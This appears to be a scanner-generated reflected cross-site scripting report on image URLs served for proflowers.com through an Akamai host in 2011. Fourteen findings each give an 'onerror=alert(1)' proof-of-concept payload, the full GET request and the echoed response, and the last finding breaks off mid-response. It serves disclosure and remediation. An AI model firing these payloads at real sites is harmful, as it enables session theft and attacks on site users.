DORK, XSS, Cross Site Scripting, Example, Proof of Concept

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_spatrio_test [REST URL parameter 9] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_spatrio_test

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d8888<img%20src%3da%20onerror%3dalert(1)>c39920fb3bf was submitted in the REST URL parameter 9. This input was echoed as d8888<img src=a onerror=alert(1)>c39920fb3bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_spatrio_testd8888<img%20src%3da%20onerror%3dalert(1)>c39920fb3bf?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:08 GMT
Connection: close

Unable to find /ProvideCommerce/ACC_spatrio_testd8888<img src=a onerror=alert(1)>c39920fb3bf

1.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/AllinoneVDay_rbye11_4giftsnipe_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/AllinoneVDay_rbye11_4giftsnipe_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a0878<img%20src%3da%20onerror%3dalert(1)>06ac558497e was submitted in the REST URL parameter 9. This input was echoed as a0878<img src=a onerror=alert(1)>06ac558497e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/AllinoneVDay_rbye11_4giftsnipe_PFa0878<img%20src%3da%20onerror%3dalert(1)>06ac558497e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 109
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:53 GMT
Connection: close

Unable to find /ProvideCommerce/AllinoneVDay_rbye11_4giftsnipe_PFa0878<img src=a onerror=alert(1)>06ac558497e

1.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAR24vday_gv10_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAR24vday_gv10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a5804<img%20src%3da%20onerror%3dalert(1)>df92fde2c2c was submitted in the REST URL parameter 9. This input was echoed as a5804<img src=a onerror=alert(1)>df92fde2c2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAR24vday_gv10_PFa5804<img%20src%3da%20onerror%3dalert(1)>df92fde2c2c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:07 GMT
Connection: close

Unable to find /ProvideCommerce/CAR24vday_gv10_PFa5804<img src=a onerror=alert(1)>df92fde2c2c

1.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CHC_SCHC1005_RkmVdayHeartv2_VDY_FHB_11_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CHC_SCHC1005_RkmVdayHeartv2_VDY_FHB_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a503d<img%20src%3da%20onerror%3dalert(1)>f24d80e0805 was submitted in the REST URL parameter 9. This input was echoed as a503d<img src=a onerror=alert(1)>f24d80e0805 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CHC_SCHC1005_RkmVdayHeartv2_VDY_FHB_11_PFa503d<img%20src%3da%20onerror%3dalert(1)>f24d80e0805?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 117
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/CHC_SCHC1005_RkmVdayHeartv2_VDY_FHB_11_PFa503d<img src=a onerror=alert(1)>f24d80e0805

1.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT315_BRR10006_VDAY11_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT315_BRR10006_VDAY11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload aa1f8<img%20src%3da%20onerror%3dalert(1)>2379bea6731 was submitted in the REST URL parameter 9. This input was echoed as aa1f8<img src=a onerror=alert(1)>2379bea6731 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT315_BRR10006_VDAY11_PFaa1f8<img%20src%3da%20onerror%3dalert(1)>2379bea6731?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:06 GMT
Connection: close

Unable to find /ProvideCommerce/CONT315_BRR10006_VDAY11_PFaa1f8<img src=a onerror=alert(1)>2379bea6731

1.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 93aff<img%20src%3da%20onerror%3dalert(1)>e77f28a9ded was submitted in the REST URL parameter 9. This input was echoed as 93aff<img src=a onerror=alert(1)>e77f28a9ded in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn93aff<img%20src%3da%20onerror%3dalert(1)>e77f28a9ded?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:06 GMT
Connection: close

Unable to find /ProvideCommerce/ContempoVase_tn93aff<img src=a onerror=alert(1)>e77f28a9ded

1.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10106_6Swizzle_VDY_11_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10106_6Swizzle_VDY_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3e084<img%20src%3da%20onerror%3dalert(1)>6d551d44b34 was submitted in the REST URL parameter 9. This input was echoed as 3e084<img src=a onerror=alert(1)>6d551d44b34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10106_6Swizzle_VDY_11_PF3e084<img%20src%3da%20onerror%3dalert(1)>6d551d44b34?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:56 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10106_6Swizzle_VDY_11_PF3e084<img src=a onerror=alert(1)>6d551d44b34

1.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Damask_AC [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Damask_AC

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 360ac<img%20src%3da%20onerror%3dalert(1)>d12f5cff97 was submitted in the REST URL parameter 9. This input was echoed as 360ac<img src=a onerror=alert(1)>d12f5cff97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Damask_AC360ac<img%20src%3da%20onerror%3dalert(1)>d12f5cff97?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:07 GMT
Connection: close

Unable to find /ProvideCommerce/Damask_AC360ac<img src=a onerror=alert(1)>d12f5cff97

1.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 809b9<img%20src%3da%20onerror%3dalert(1)>db4c58a7a72 was submitted in the REST URL parameter 9. This input was echoed as 809b9<img src=a onerror=alert(1)>db4c58a7a72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn809b9<img%20src%3da%20onerror%3dalert(1)>db4c58a7a72?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:06 GMT
Connection: close

Unable to find /ProvideCommerce/GingerVase_tn809b9<img src=a onerror=alert(1)>db4c58a7a72

1.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu11_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 70245<img%20src%3da%20onerror%3dalert(1)>3f5fb4274de was submitted in the REST URL parameter 9. This input was echoed as 70245<img src=a onerror=alert(1)>3f5fb4274de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu11_PF70245<img%20src%3da%20onerror%3dalert(1)>3f5fb4274de?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/LLYassrtperu11_PF70245<img src=a onerror=alert(1)>3f5fb4274de

1.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 58380<img%20src%3da%20onerror%3dalert(1)>53b2f6a2f5e was submitted in the REST URL parameter 9. This input was echoed as 58380<img src=a onerror=alert(1)>53b2f6a2f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF58380<img%20src%3da%20onerror%3dalert(1)>53b2f6a2f5e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/MBQ15orchpurp10_PF58380<img src=a onerror=alert(1)>53b2f6a2f5e

1.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg10_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 58a40<img%20src%3da%20onerror%3dalert(1)>eed651848d3 was submitted in the REST URL parameter 9. This input was echoed as 58a40<img src=a onerror=alert(1)>eed651848d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg10_PF58a40<img%20src%3da%20onerror%3dalert(1)>eed651848d3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxhugskiss_rbyg10_PF58a40<img src=a onerror=alert(1)>eed651848d3

1.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgrowerschoice11_VdayPremiumFrills_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgrowerschoice11_VdayPremiumFrills_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c75a4<img%20src%3da%20onerror%3dalert(1)>d12803aeb3e was submitted in the REST URL parameter 9. This input was echoed as c75a4<img src=a onerror=alert(1)>d12803aeb3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgrowerschoice11_VdayPremiumFrills_PFc75a4<img%20src%3da%20onerror%3dalert(1)>d12803aeb3e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:52 GMT
Connection: close

Unable to find /ProvideCommerce/MBQgrowerschoice11_VdayPremiumFrills_PFc75a4<img src=a onerror=alert(1)>d12803aeb3e

1.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye09_3_FREV_PF [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye09_3_FREV_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 733a8<img%20src%3da%20onerror%3dalert(1)>699c828870e was submitted in the REST URL parameter 9. This input was echoed as 733a8<img src=a onerror=alert(1)>699c828870e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye09_3_FREV_PF733a8<img%20src%3da%20onerror%3dalert(1)>699c828870e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
